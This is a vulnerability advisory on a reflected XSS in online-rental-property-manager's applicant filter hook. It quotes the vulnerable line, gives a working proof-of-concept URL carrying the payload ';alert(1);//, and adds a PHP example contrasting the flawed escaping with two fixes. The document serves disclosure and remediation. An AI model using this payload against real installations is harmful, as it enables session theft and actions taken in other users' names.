vendor: online-rental-property-manager
version: <= 7.1, fixed in commit edb404c4e31966338762de3022d0e6cfac63ca2b
An XSS (Cross-Site Scripting, CWE-79) vulnerability exists in app/hooks/applicants_and_tenants_filter.php.

At line 93, $FilterValue[1] is inserted into a single-quoted JavaScript string literal after being passed through htmlspecialchars(). However, htmlspecialchars() does not escape the single quote (') unless the ENT_QUOTES flag is given (this is the default behaviour on PHP versions before 8.1; PHP 8.1 changed the default flags to include ENT_QUOTES). An attacker can therefore use a single quote to terminate the JavaScript string and inject arbitrary JavaScript code, which runs in the browser of any user who opens the crafted link.

This allows attackers to obtain the cookies of the administrator and other users and impersonate their sessions with the stolen cookies (unless the session cookie is marked HttpOnly), or to perform any action in the application on the victim's behalf.
<script>
    // for population: emitted by app/hooks/applicants_and_tenants_filter.php (line 93).
    // htmlspecialchars() is called without ENT_QUOTES, so a ' in $FilterValue[1]
    // closes the JavaScript string literal and the rest of the value is executed.
    var filterValue_13 = '<?php echo htmlspecialchars($FilterValue[ 1 ]); ?>';
    $j(function () {
        if (filterValue_13) {
            $j("input[class =filter_13][value ='" + filterValue_13 + "']").attr("checked", "checked");
        }
    })
</script>
The PoC is as follows (the payload ';alert(1);// is URL-encoded in the FilterValue[1] parameter; the other parameters only need to be present so the filter hook renders the field):
http://localhost/online-rental-property-manager/app/applicants_and_tenants_view.php?SearchString=&Filter_x=1&current_view=TV&SortField=&SelectedID=&SelectedField=&SortDirection=&FirstRecord=1&NoDV=1&PrintDV=&DisplayRecords=all&FilterValue[0]=xxxx&FilterValue[1]=%27;alert(1);//&FilterField[0]=1&FilterField[1]=2
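The following is an added example written for this write-up; it is not code from online-rental-property-manager or from its fix commit. It reproduces the line-93 pattern with the PoC payload and shows two hardened forms. The function names (render_vulnerable, render_ent_quotes, render_json) are illustrative. The flags are passed explicitly so the vulnerable behaviour is reproduced regardless of PHP version, since PHP 8.1 made ENT_QUOTES part of the htmlspecialchars() default.

```php
<?php
// Added example, not part of the original project: why htmlspecialchars()
// without ENT_QUOTES fails to protect a single-quoted JavaScript string,
// and two ways to fix it. $payload is the value from the PoC URL.

$payload = "';alert(1);//";

// Pre-PHP-8.1 default behaviour: ENT_COMPAT escapes only double quotes,
// so the leading ' survives and closes the JavaScript string literal.
function render_vulnerable(string $value): string
{
    return "var filterValue_13 = '" . htmlspecialchars($value, ENT_COMPAT) . "';";
}

// Fix 1: ENT_QUOTES turns ' into &#039;. The browser does not decode
// entities inside <script>, so the quote can no longer close the string.
// (< and & are escaped too, so </script> cannot be injected either.)
function render_ent_quotes(string $value): string
{
    return "var filterValue_13 = '"
        . htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8')
        . "';";
}

// Fix 2 (preferred for JavaScript contexts): emit a JSON literal and
// hex-escape the characters that are significant in HTML. This also
// handles backslashes and control characters, which htmlspecialchars()
// leaves untouched.
function render_json(string $value): string
{
    $flags = JSON_HEX_TAG | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_HEX_AMP;
    return "var filterValue_13 = " . json_encode($value, $flags) . ";";
}

echo "vulnerable : ", render_vulnerable($payload), "\n";
echo "ENT_QUOTES : ", render_ent_quotes($payload), "\n";
echo "json_encode: ", render_json($payload), "\n";
```

Run with `php example.php`. In the first line of output the string literal is closed by the injected quote and `alert(1);` stands as its own statement, which is exactly what the PoC URL triggers; in the second the quote is rendered as `&#039;` and the value stays an inert string; in the third the value is a double-quoted JSON literal with the quote, slashes and any HTML-significant characters escaped. The json_encode form is the safer general choice because htmlspecialchars() still passes backslashes through, which can matter when a value is placed next to other attacker-influenced data.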